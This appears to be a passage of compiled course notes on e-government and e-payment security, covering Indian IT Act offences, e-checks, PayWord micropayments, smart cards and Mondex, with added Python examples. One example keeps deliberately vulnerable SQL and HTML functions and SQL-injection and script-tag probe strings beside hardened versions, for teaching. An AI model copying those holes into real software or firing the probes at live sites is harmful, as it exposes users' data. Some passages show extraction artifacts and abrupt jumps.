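PBKDF2_ROUNDS = 100_000


def register(username: str, password: str, roles: set) -> None:
    """Store authentication material: a salted PBKDF2 hash, never the password."""
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    USERS[username] = {"salt": salt, "hash": digest, "roles": set(roles)}


def authenticate(username: str, password: str) -> bool:
    """Authentication: verify the caller is who they claim to be."""
    user = USERS.get(username)
    if user is None:
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), user["salt"], PBKDF2_ROUNDS)
    return hmac.compare_digest(digest, user["hash"])   # constant-time comparison


def authorize(username: str, required_role: str) -> bool:
    """Authorization: does this (already authenticated) user hold the right?"""
    return required_role in USERS.get(username, {}).get("roles", set())


def seal(payload: str) -> str:
    """Integrity: an HMAC tag over the submitted data. A shared key gives
    integrity only; anyone holding the key could have produced the tag,
    so this is not non-repudiation."""
    return hmac.new(SERVICE_KEY, payload.encode(), "sha256").hexdigest()


def verify_seal(payload: str, tag: str) -> bool:
    return hmac.compare_digest(seal(payload), tag)


def audit(actor: str, action: str) -> str:
    """Traceability: each record commits to the previous record's hash, so a
    removed or altered entry breaks every later hash in the chain."""
    prev = AUDIT_LOG[-1]["hash"] if AUDIT_LOG else "0" * 64
    ts = datetime.now(timezone.utc).isoformat()
    h = hashlib.sha256(f"{prev}|{ts}|{actor}|{action}".encode()).hexdigest()
    AUDIT_LOG.append({"prev": prev, "ts": ts, "actor": actor, "action": action, "hash": h})
    return h


def audit_chain_intact() -> bool:
    """Recompute the chain from the genesis value; any edit makes this False."""
    prev = "0" * 64
    for rec in AUDIT_LOG:
        expected = hashlib.sha256(
            f"{prev}|{rec['ts']}|{rec['actor']}|{rec['action']}".encode()).hexdigest()
        if rec["prev"] != prev or rec["hash"] != expected:
            return False
        prev = rec["hash"]
    return True


def submit_tax_return(username: str, password: str, form: str) -> dict:
    """One service request: authenticate, authorize, seal, then record."""
    if not authenticate(username, password):
        audit(username, "login-failed")
        return {"ok": False, "reason": "authentication"}
    if not authorize(username, "citizen"):
        audit(username, "denied:submit")
        return {"ok": False, "reason": "authorization"}
    tag = seal(form)
    audit(username, f"submit:{tag[:16]}")
    return {"ok": True, "tag": tag}
```

Note that failures are logged too: a traceability requirement is only met if the denied attempts appear in the same tamper-evident chain as the successful ones.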

Examples of organizational and technical measures to prevent unauthorized access and processing are:

Protecting premises, equipment and systems software, including input-output units
Protecting software applications used to process personal data
Preventing unauthorized access to personal data during transmission thereof, including transmission via telecommunication means and networks
Ensuring effective methods of blocking, destruction, erasure or anonymization of personal data
Enabling subsequent determination of when individual personal data were entered into a filing system, used or otherwise processed, and the person responsible, for the period covered by statutory protection of the rights of an individual with regard to unauthorized supply or processing of personal data

Although trusted security and privacy measures constitute a crucial success factor for e-Government, this has not yet been adequately addressed: the UN 2012 Survey shows that only 20% of national portals clearly indicate the presence of security features. Europe is leading, with 44% of countries displaying secure links on their national websites, but the survey does not consider regional and local websites, nor the many decentralized public organization web portals.

3. INFORMATION SECURITY THREATS

Services provided by e-Government to citizens, enterprises, public officers, government administration and agencies via Internet and mobile connections are vulnerable to a variety of threats. Detailed examples exist of cyber attacks using techniques like packet sniffers, probes, malware, Internet infrastructure attacks, denial of service attacks, remote-to-local attacks and user-to-root attacks. The successful adoption of an ISMS is important to protect information assets, allowing an organization to:

Achieve greater assurance that its information assets are adequately protected against information security risks on a continual basis
Maintain a structured and comprehensive framework for identifying and assessing information security risks, selecting and applying applicable controls, and measuring and improving their effectiveness
Continually improve its control environment
Effectively achieve legal and regulatory compliance

There are simple and well-known web application vulnerabilities that could be avoided, but e-Government websites are still vulnerable. A research work found 816 e-Government websites from 212 different countries were vulnerable to Cross Site Scripting (XSS) and Structured Query Language (SQL) injection. An SQL injection attack can compromise data integrity, while XSS is a vulnerability which attackers may exploit to steal users' information.
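The two "simple and well-known" flaws named above come down to one mistake each: building a query by string concatenation, and reflecting user input into HTML without escaping. The Python below is an added example for these notes (not from the research work cited, and not any real portal's code) that puts the vulnerable form of each beside its hardened form, using an in-memory SQLite table of constructed citizen records. The probe strings are likewise constructed; the only point is that the hardened versions treat them as inert text.

```python
import html
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed sample table of citizen records (in-memory, nothing real)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE citizens (id INTEGER PRIMARY KEY, name TEXT, tax_id TEXT)")
    conn.executemany("INSERT INTO citizens (name, tax_id) VALUES (?, ?)",
                     [("Asha", "TAX-0001"), ("Ravi", "TAX-0002"), ("Meera", "TAX-0003")])
    conn.commit()
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, name: str) -> list:
    """Deliberately vulnerable: user input is pasted into the SQL text, so the
    input can change the *meaning* of the query (SQL injection)."""
    sql = f"SELECT name, tax_id FROM citizens WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, name: str) -> list:
    """Hardened: the query shape is fixed; the input is bound as a value only,
    so it can match a name but never alter the WHERE clause."""
    return conn.execute(
        "SELECT name, tax_id FROM citizens WHERE name = ?", (name,)).fetchall()


def render_unsafe(name: str) -> str:
    """Deliberately vulnerable: reflects input into HTML unescaped (XSS)."""
    return f"<p>Results for {name}</p>"


def render_safe(name: str) -> str:
    """Hardened: escape on output, so input is shown as text, never as markup."""
    return f"<p>Results for {html.escape(name, quote=True)}</p>"


def demo() -> dict:
    conn = build_db()
    honest = "Asha"
    # Constructed probe: plain text to the safe query, but SQL to the unsafe one.
    probe = "x' OR '1'='1"
    tag = "<script>alert(1)</script>"   # constructed markup probe for the renderer
    return {
        "vuln_honest": len(lookup_vulnerable(conn, honest)),   # 1 row, as intended
        "vuln_probe": len(lookup_vulnerable(conn, probe)),     # every row leaks
        "safe_probe": len(lookup_safe(conn, probe)),           # no such citizen
        "unsafe_html_has_tag": "<script>" in render_unsafe(tag),
        "safe_html_has_tag": "<script>" in render_safe(tag),
    }
```

The defensive rule in both halves is the same: keep code and data separate. Parameter binding does that on the database side; output escaping does it on the browser side. Neither is a filter on the input, which is why they hold up against probes the developer never anticipated.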

Specific security measures like firewalls, intrusion detection software, encryption and secure networks must be defined, designed and implemented for government agencies to provide the appropriate levels of security. But information security must also take into consideration the people and processes that rely on the systems. Employees with daily access to e-Government systems must be trained on cybersecurity, and this aspect must become part of their job. A study by the Department of Computer Science at Columbia University shows how the human factor influences cybersecurity policies and how that work could be used to train government employees to improve the security posture of government departments and agencies.

CYBER CRIME AND LAWS

The expression 'Crime' is defined as an act which subjects the doer to legal punishment, or any offence against morality, social order or any unjust or shameful act. The "Offence" is defined in the Code of Criminal Procedure to mean an act or omission made punishable by any law for the time being in force.

Cyber Crime is emerging as a serious threat. Worldwide, governments, police departments and intelligence units have started to react.

Cyber Crime is a term used to broadly describe criminal activity in which computers or computer networks are a tool, a target or a place of criminal activity, and includes everything from electronic cracking to denial of service attacks. It is also used to include traditional crimes in which computers or networks are used to enable the illicit activity.

Computer crime mainly consists of unauthorized access to computer systems, data alteration, data destruction and theft of intellectual property. Cyber crime in the context of national security may involve hacking, traditional espionage or information warfare and related activities.

Pornography, Threatening Email, Assuming someone's Identity, Sexual Harassment, Defamation, Spam and Phishing are some examples where computers are used to commit crime, whereas Viruses, Worms and Industrial Espionage, Software Piracy and Hacking are examples where computers become the target of crime.

Cyber Crime Variants

Hacking

Hacking is a crime which entails cracking systems and gaining unauthorized access to the data stored in them. Hacking witnessed a 37 per cent increase this year.

Cyber Squatting

Cyber Squatting is the act of registering a famous Domain Name and then selling it for a fortune. This is an issue that has not been tackled in the IT ACT 2000.

Phishing

Phishing is just one of the many frauds on the Internet trying to fool people into parting with their money. Phishing refers to the receipt of unsolicited emails by customers of Financial Institutions, requesting them to enter their Username, Password or other personal information to access their Account for some reason. The fraudster then has access to the customer's online bank account and to the funds contained in that account.

Cyber Stalking

Cyber Stalking is the use of the Internet or other electronic means to stalk someone. This term is used interchangeably with online harassment and online abuse. Stalking generally involves harassing or threatening behaviour that an individual engages in repeatedly, such as following a person, appearing at a person's home or place of business, making harassing phone calls, leaving written messages or objects, or vandalizing a person's property.

Vishing

Vishing is the criminal practice of using social engineering and Voice over IP (VoIP) to gain access to private personal and financial information from the public for the purpose of financial reward. The term is a combination of "Voice" and "phishing". Vishing exploits the public's trust in landline telephone services. Vishing is typically used to steal credit card numbers or other information used in identity theft schemes from individuals.

A rapidly growing online user base

121 Million Internet Users
65 Million Active Internet Users, up by 28% from 51 million in 2010
50 Million users shop online on Ecommerce and Online Shopping Sites
46+ Million Social Network Users
346 million mobile users had subscribed to Data Packages

CYBER LAW

(1) Whoever, with the intent to cause, or knowing that he is likely to cause, wrongful loss or damage to the public or any person, destroys or deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means, commits hack.

(2) Whoever commits hacking shall be punished with imprisonment up to three years, or with fine which may extend up to two lakh rupees, or with both.

Whoever, without permission of the owner of the computer:

Secures access
Downloads, copies or extracts any data, computer database or any information
Introduces or causes to be introduced any virus or contaminant
Disrupts or causes disruption
Denies or causes denial of access to any person
Provides any assistance to any person to facilitate access
Charges the services availed of by a person to the account of another person by tampering with or manipulating any computer, computer system or computer network

shall be liable to pay damages by way of compensation not exceeding one crore rupees to the person so affected.

Section – 43

Destroys, deletes or alters any information residing in a computer resource, or diminishes its value or utility, or affects it injuriously by any means.

Steals, conceals, destroys or alters, or causes any person to steal, conceal, destroy or alter, any computer source code used for a computer resource with an intention to cause damage.

"If any person, dishonestly or fraudulently, does any act referred to in section 43, he shall be punishable with imprisonment for a term which may extend to two three years or with fine which may extend to five lakh rupees or with both." [S66]

S66A - Punishment for sending offensive messages through communication service etc

Any person who sends by means of a computer resource or a communication device

Any information that is grossly offensive or has menacing character or

PREPARED BY ARUN PRATAP SINGH 57

57

Any information which he knows to be false but for the purpose of causing annoyance

inconvenience danger obstruction insult injury criminal intimidation enmity hatred or

ill will persistently makes by making use of such computer resource or a communication

device

Any electronic mail or electronic mail message for the purpose of causing annoyance or

inconvenience or to deceive or to mislead the addressee or recipient about the origin of

such messages

Shall be punishable with imprisonment for a term which may extend to three years and with

fine

S 66C - Punishment for identity theft

ldquoWhoever fraudulently or dishonestly make use of the electronic signature password or

any other unique identification feature of any other person shall be punished with imprisonment

of either description for a term which may extend to three years and shall also be liable to fine

which may extend to rupees one lakhrdquo

S 66D - Punishment for cheating by personation by using computer resource

ldquoWhoever by means of any communication device or computer resource cheats by

personation shall be punished with imprisonment of either description for a term which may

extend to three years and shall also be liable to fine which may extend to one lakh rupees ldquo

S 66E - Punishment for violation of privacy

ldquoWhoever intentionally or knowingly captures publishes or transmits the image of a private

area of any person without his or her consent under circumstances violating the privacy of that

person shall be punished with imprisonment which may extend to three years or with fine not

exceeding two lakh rupees or with bothrdquo

S 67 A - Punishment for publishing or transmitting of material containing sexually

explicit act etc in electronic form

ldquoWhoever publishes or transmits or causes to be published or transmitted in the electronic form

any material which contains sexually explicit act or conduct shall be punished on first conviction

with imprisonment of either description for a term which may extend to five years and with fine

which may extend to ten lakh rupeesrdquo

S 67C - Preservation and Retention of information by intermediaries

"(1) Intermediary shall preserve and retain such information as may be specified for such duration and in such manner and format as the Central Government may prescribe.

(2) Any intermediary who intentionally or knowingly contravenes the provisions of sub-section (1) shall be punished with an imprisonment for a term which may extend to three years and shall also be liable to fine."


IT ACT

The Information Technology Act, 2000 (also known as ITA-2000 or the IT Act) is an Act of the Indian Parliament (No. 21 of 2000) notified on October 17, 2000. This act is being opposed by the Save Your Voice campaign and other civil society organizations in India. The user-review and consumer social networking site MouthShut.com has filed a writ petition in the Supreme Court of India to repeal and nullify parts of the IT Act 2000.

The United Nations General Assembly, by resolution A/RES/51/162 dated 30 January 1997, adopted the Model Law on Electronic Commerce adopted by the United Nations Commission on International Trade Law. This is referred to as the UNCITRAL Model Law on E-Commerce. Following the UN Resolution, India passed the Information Technology Act 2000 in May 2000, which came into force on October 17, 2000. The Information Technology Act 2000 has been substantially amended through the Information Technology (Amendment) Act 2008, which was passed by the two houses of the Indian Parliament on December 23 and 24, 2008. It got Presidential assent on February 5, 2009 and came into force on October 27, 2009. The amended Act has provided additional focus on information security. It has added several new sections on offences, including cyber terrorism and data protection. A set of Rules related to sensitive personal information and reasonable security practices (mentioned in section 43A of the ITAA 2008) was notified in April 2011.

Provisions –

The Information Technology Act 2000 consisted of 94 sections segregated into 13 chapters. Four schedules form part of the Act. In the 2008 version of the Act there are 124 sections (excluding 5 sections that have been omitted from the earlier version) and 14 chapters. Schedules I and II have been replaced; Schedules III and IV are deleted.

The Information Technology Act 2000 addressed the following issues:

1. Legal recognition of electronic documents
2. Legal recognition of digital signatures
3. Offences and contraventions
4. Justice dispensation systems for cybercrimes

Offences –

Section | Offence | Punishment
65 | Tampering with computer source documents - Intentional concealment, destruction or alteration of source code when the computer source code is required to be kept or maintained by law for the time being in force | Imprisonment up to three years, or/and with fine up to 2 lakh rupees
66 | Hacking | Imprisonment up to three years, or/and with fine up to 5 lakh rupees
66-A | Sending offensive message through electronic means - Sending any information through an electronic message that is grossly offensive or has menacing character and might cause insult, injury, criminal intimidation, enmity, hatred or ill will, etc., or sending such mail intended to deceive or to mislead the addressee or recipient about the origin of such messages | Imprisonment up to three years and with fine

Criticisms –

The 2008 Amendment Act was passed in an eventful Parliamentary session on 23 December 2008 with no discussion in the House. Some cyber law observers have criticized the amendments on the ground of a lack of legal and procedural safeguards to prevent violation of the civil liberties of Indians. There has also been appreciation of the amendments from many observers because they address the issue of cyber security.

Section 69 empowers the Central Government/State Government or its authorized agency to intercept, monitor or decrypt any information generated, transmitted, received or stored in any computer resource if it is necessary or expedient to do so in the interest of the sovereignty or integrity of India, defence of India, security of the State, friendly relations with foreign States or public order, or for preventing incitement to the commission of any cognizable offence, or for investigation of any offence. They can also secure assistance from computer personnel in decrypting data (see mandatory decryption) under penalty of imprisonment.

Section 66A is widely criticized. It has led to numerous abuses reported by the press. Section 66A has also been criticised and challenged in the Lucknow and Madras High Courts for its constitutional validity. Based on Section 66A, the Bombay High Court has held that creating a website and storing false information on it can entail cyber crime.


who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with.

2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplication of the scanned electronic representations of customer checks.

3. Encryption. The ACH Network automatically encrypts messages using 128-bit encryption and a secure sockets layer (SSL).

How to get started with electronic checks

Here's how to implement electronic check conversion as quickly and easily as possible:

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.

2. Notify your customers that your business will begin using electronic check conversion. Federal laws require you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.

3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data, and integrate your new system with your business management software.

4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards, including Visa, MasterCard, Discover and American Express. In addition to offering many ways to get paid, QuickBooks Payments also enables businesses to email invoices to their customers with a Pay Now button. Our data shows us that businesses using QuickBooks Payments are getting paid twice as fast due to the e-invoicing feature.

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. Payer (customer/bill payer) is prompted to authorize electronic debit and enter bank routing number (ABA) and account number.

2. Merchant's sales system securely transfers order information to CyberSource over the Internet.

3. CyberSource forwards bank routing number and account number to processor.

4. The routing number and account number are validated and the integrity of the account's checking history is verified. Processor forwards approve/decline results to CyberSource.

5. CyberSource returns approval/decline message to merchant.

6. If approved, CyberSource routes check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.
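As an added illustration of duplicate detection (item 2 above) and the routing/account validation of step 4, the following Python is not CyberSource's, QuickBooks' or the ACH Network's code: it checks the ABA routing number's check digit and rejects a second presentment of the same e-check before anything is forwarded to a processor. The routing and account numbers are constructed sample values, and the three-field fingerprint is an assumption about what identifies one presentment.

```python
"""Merchant-side screening of e-checks before they are sent for processing.

Added illustration, not code from CyberSource, QuickBooks or the ACH Network.
Routing and account numbers below are constructed sample values.
"""
import hashlib
from dataclasses import dataclass

# An ABA routing number has nine digits. Weighting the digits 3, 7, 1, 3, 7, 1,
# 3, 7, 1 and summing must give a multiple of 10; the ninth digit is the check
# digit that makes this true.
_ABA_WEIGHTS = (3, 7, 1, 3, 7, 1, 3, 7, 1)


def valid_routing_number(routing: str) -> bool:
    """Return True if `routing` is nine digits with a correct check digit."""
    if len(routing) != 9 or not routing.isdigit():
        return False
    total = sum(int(d) * w for d, w in zip(routing, _ABA_WEIGHTS))
    return total % 10 == 0


@dataclass(frozen=True)
class ECheck:
    routing: str
    account: str
    check_number: int
    amount_cents: int


def echeck_fingerprint(chk: ECheck) -> str:
    """Stable identifier used for duplicate detection.

    The raw account number is not kept in the seen-set; only a SHA-256 over the
    fields assumed to identify one unique presentment is stored.
    """
    material = f"{chk.routing}|{chk.account}|{chk.check_number}|{chk.amount_cents}"
    return hashlib.sha256(material.encode()).hexdigest()


class ECheckGate:
    """Validation plus duplicate detection for a batch of e-checks."""

    def __init__(self) -> None:
        self._seen: set = set()

    def screen(self, chk: ECheck) -> str:
        """Return 'accept', 'reject:routing', 'reject:amount' or 'reject:duplicate'."""
        if not valid_routing_number(chk.routing):
            return "reject:routing"
        if chk.amount_cents <= 0:
            return "reject:amount"
        fp = echeck_fingerprint(chk)
        if fp in self._seen:
            return "reject:duplicate"
        self._seen.add(fp)
        return "accept"


def run_sample_batch() -> list:
    """Screen a constructed batch; returns the decision for each item in order."""
    gate = ECheckGate()
    batch = [
        ECheck("123456780", "000987654321", 1041, 4999),  # valid check digit
        ECheck("123456789", "000987654321", 1042, 4999),  # check digit wrong
        ECheck("123456780", "000987654321", 1041, 4999),  # same check presented again
        ECheck("123456780", "000987654321", 1043, 0),     # zero amount
    ]
    return [gate.screen(c) for c in batch]


if __name__ == "__main__":
    for decision in run_sample_batch():
        print(decision)
```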

Four Different Scenarios of the FSTC E-check System –


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as the micropayment method, is emerging to cater for very low value transactions. Examples:

Millicent (pre-payment/credit based)
PayWord (post-payment)

MICROPAYMENT IS -

Very small payments made over the Web
Transactions too small for credit cards
Can be as little as a fraction of a cent
An alternative to subscription and advertising
Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be feasible for processing through credit card companies.

Here's one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers. Seller-based accounts are more common for repeat business with an individual enterprise.

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks –

With a micropayment system, many small transactions are summarised over a defined period of time and charged in one bill. For that reason, micropayments are applicable for businesses where even small costs for every single transaction would be inefficient. The main benefits from the customer side in using micropayment are speed and flexibility. From the merchants' side, speed and acceptable transaction fees are very important. As the transactions involve small capital, security does not have the highest priority. Much more important than security is trust: users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high. Any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.
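The aggregation just described (many small payments collected into one bill) and PayWord, named earlier as a post-payment scheme, can be shown together with a hash chain: the user commits once to the chain's root, reveals one link per unit spent, the vendor verifies each link with a hash and redeems the whole run with the broker as a single larger payment. This Python example is added here and is not code from the original notes or from any provider; the vendor name, the unit price and the HMAC standing in for the user's signed commitment are assumptions.

```python
"""PayWord-style micropayment chain with aggregated redemption.

Added illustration, not the notes' or any vendor's code. The HMAC is a
stand-in for the signature the real scheme puts on the commitment; names,
amounts and keys are constructed.
"""
import hashlib
import hmac
import os
from dataclasses import dataclass


def h(x: bytes) -> bytes:
    return hashlib.sha256(x).digest()


def make_chain(n: int, seed: bytes = b"") -> list:
    """Return [w0, w1, ..., wn] with w_i = H(w_{i+1}); w0 is the commitment."""
    words = [seed or os.urandom(32)]           # w_n, the secret end of the chain
    for _ in range(n):
        words.append(h(words[-1]))
    words.reverse()                            # index 0 is now w0 = H^n(w_n)
    return words


@dataclass
class Commitment:
    vendor: str
    w0: bytes
    unit_cents: int
    mac: bytes        # stand-in for the user's signature over the other fields


def commit(user_key: bytes, vendor: str, w0: bytes, unit_cents: int) -> Commitment:
    msg = vendor.encode() + w0 + unit_cents.to_bytes(4, "big")
    return Commitment(vendor, w0, unit_cents, hmac.new(user_key, msg, "sha256").digest())


class VendorLedger:
    """Vendor side: accepts paywords and remembers the highest index seen."""

    def __init__(self, c: Commitment) -> None:
        self.c = c
        self.last_word = c.w0
        self.count = 0

    def accept(self, word: bytes, index: int) -> bool:
        """Accept w_index if hashing it (index - count) times reaches last_word."""
        steps = index - self.count
        if steps <= 0:
            return False                       # replayed or out-of-order payword
        x = word
        for _ in range(steps):
            x = h(x)
        if x != self.last_word:
            return False                       # not a link of this chain
        self.last_word, self.count = word, index
        return True

    def redemption_total_cents(self) -> int:
        """The single aggregated amount the vendor claims from the broker."""
        return self.count * self.c.unit_cents


def broker_settle(user_key: bytes, c: Commitment, last_word: bytes, count: int) -> int:
    """Broker re-checks the commitment and the final payword; returns cents owed."""
    msg = c.vendor.encode() + c.w0 + c.unit_cents.to_bytes(4, "big")
    if not hmac.compare_digest(c.mac, hmac.new(user_key, msg, "sha256").digest()):
        return 0
    x = last_word
    for _ in range(count):
        x = h(x)
    return count * c.unit_cents if x == c.w0 else 0


def demo() -> tuple:
    """Spend 5 of 100 paywords at 1 cent each; returns (accept flags, vendor total, broker total)."""
    user_key = b"constructed-user-key"
    chain = make_chain(100)
    c = commit(user_key, "news-site", chain[0], 1)
    ledger = VendorLedger(c)
    results = [ledger.accept(chain[i], i) for i in (1, 2, 3)]   # three articles
    results.append(ledger.accept(chain[5], 5))                  # pay two units at once
    results.append(ledger.accept(chain[4], 4))                  # replay: rejected
    results.append(ledger.accept(h(b"junk"), 6))                # forged word: rejected
    total = ledger.redemption_total_cents()
    settled = broker_settle(user_key, c, ledger.last_word, ledger.count)
    return results, total, settled


if __name__ == "__main__":
    print(demo())
```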

Payment options –

Micropayment providers offer various payment modules. Merchants need to sign up for an account with a chosen provider and decide on a module that suits their needs. The customer gets an option (or options) for how to pay for the desired content or goods.

The most common micropayment options are listed below.

Call2pay: Payment by telephone. The customer is requested to call a toll number. The fee is set on a per-call basis for the desired payment amount.

Handypay: Payment via mobile phone bill. The customer enters his or her cell phone number and receives an SMS with a TAN in order to confirm payment.

Ebank2pay: Payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN. After making payment, the customer receives access to the purchased product.

Credit card: Payment per credit card. The customer enters his credit card data and confirms the transaction. The transactions can optionally be carried out with the 3-D Secure™ method (Verified by VISA™ and Mastercard SecureCode™).

Direct debit: Payment by direct debit. The customer enters his or her bank ID and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to users' PayPal account and allows transactions of less than US$12 to take place. The service is, as of 2013, offered in select currencies only.

Micropayment Uses –

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009 a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing[2]. Smart cards may provide strong security authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits which can process data. This implies that it can receive input which is processed and delivered as an output.

What is a Smart Card?

Standard credit card-sized with microchip embedded on it
Two types:
o Memory-only chips
o Microprocessor chips
Can hold up to 32000 bytes
Newer smart cards have math co-processors
o Perform complex encryption routines quickly
In 1968 German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards –


Why Smart Cards –

Improve the convenience and security of any transaction
Provide tamper-proof storage of user and account identity
Provide vital components of system security
Protect against a full range of security threats

Advantages –

Flexibility
Security
Portability
Increasing data storage capacity
Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications –

Ticketless travel
o Seoul bus system: 4M cards, 1B transactions since 1996
o Planned: the SF Bay Area system
Authentication, ID
Medical records
Ecash
Store loyalty programs
Personal profiles
Government
Licenses
Mall parking
Example: Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards
Transfer of electronic money over the Internet or telephone networks, etc.
Keep transaction records
Password protection and "lock card" functions
Portable balance finder to check balance
Support multiple currencies


ADVANTAGES

CONSUMER –

Convenience
Accessibility
On-chip record of recent transactions
Home load
Internet purchases

MERCHANT –

Reliable off-line payment
Higher security
Low transaction cost
Reduced cash handling

FINANCIAL INSTITUTION –

Strengthen customer relationships
New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, initiated by NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex Protect Privacy –

Principles protected:
o Limits for collecting personal information
o Limits for using, disclosing and keeping personal information
o Keeping personal information accurate
o Safeguarding personal information

Limits for collecting personal information
o loads from account
o deposits into account
o lost transactions

Limits for using, disclosing and keeping personal information
o safeguard deposits
o to reimburse for non-performance

Keeping personal information accurate
o load and unload are online
o rolling 10 transactions provides exact spend and retailer name

Safeguarding personal information
o firewalls in Multos - between applications - ITSEC 6 designation
o transaction data to retailer is deliberately limited
o individual transaction data is not collected by banks - Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then utilize the Mondex smart card to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology. The Mondex smart card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995 – two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit/debit card to make a purchase, communication is required between the bank and your card. However, Mondex cards contain an embedded microprocessor with sophisticated encryption methods and tamper-proof hardware designed to protect them from hackers. The ability of the Mondex smart card to do offline transactions means they are less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they actually are recorded in the digital memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM or as soon as the retailer uploads transaction data to the bank computer.

A significant disadvantage with Mondex is that transactions aren't truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you can't purchase a Mondex card without revealing your identity. Each card has a unique identification number through which owners can easily be identified. Mondex smart cards have not been as successful as originally predicted. Customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you should lose a Mondex smart card. Losing a Mondex card is just like losing a wallet full of cash. With a credit card you're protected against any loss exceeding $50. This protection is not currently available with a Mondex smart card.

According to the Mondex smart card system, it is fully auditable. There is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex can't claim to be a fully auditable system. After a number of transactions, overflow can occur as a result of limited memory in the Mondex smart cards. This means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, they do possess the ability to tolerate minor fraud loss.

Mondex believes their electronic payment system is secure. They are convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.
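To make the auditability point concrete, the following Python simulation (added here, not Mondex code, with a simplified purse and no cryptography) keeps a rolling 10-entry log on the card, as the privacy notes above describe, and shows that the two balances stay consistent while the later upload can no longer account for every transaction. Card ids, the starting balance and the amounts are constructed.

```python
"""Offline card-to-card transfers with a bounded on-card transaction log.

Added illustration of the audit gap described in the text; not Mondex code.
The purse is simplified (no value certificates, no cryptography) and the
card ids, balance and amounts are constructed.
"""
from collections import deque
from dataclasses import dataclass

LOG_DEPTH = 10   # the "rolling 10 transactions" kept by the purse in the text


@dataclass(frozen=True)
class LogEntry:
    seq: int
    counterparty: str
    amount_cents: int   # negative for a payment made, positive for value received


class Purse:
    def __init__(self, card_id: str, balance_cents: int) -> None:
        self.card_id = card_id
        self.balance = balance_cents
        self.seq = 0                              # monotonic transaction counter
        self.log: deque = deque(maxlen=LOG_DEPTH)  # oldest entries are silently evicted

    def _record(self, counterparty: str, amount: int) -> None:
        self.seq += 1
        self.log.append(LogEntry(self.seq, counterparty, amount))

    def pay(self, payee: "Purse", amount: int) -> bool:
        """Offline transfer: value leaves this card only if the funds are present."""
        if amount <= 0 or amount > self.balance:
            return False
        self.balance -= amount
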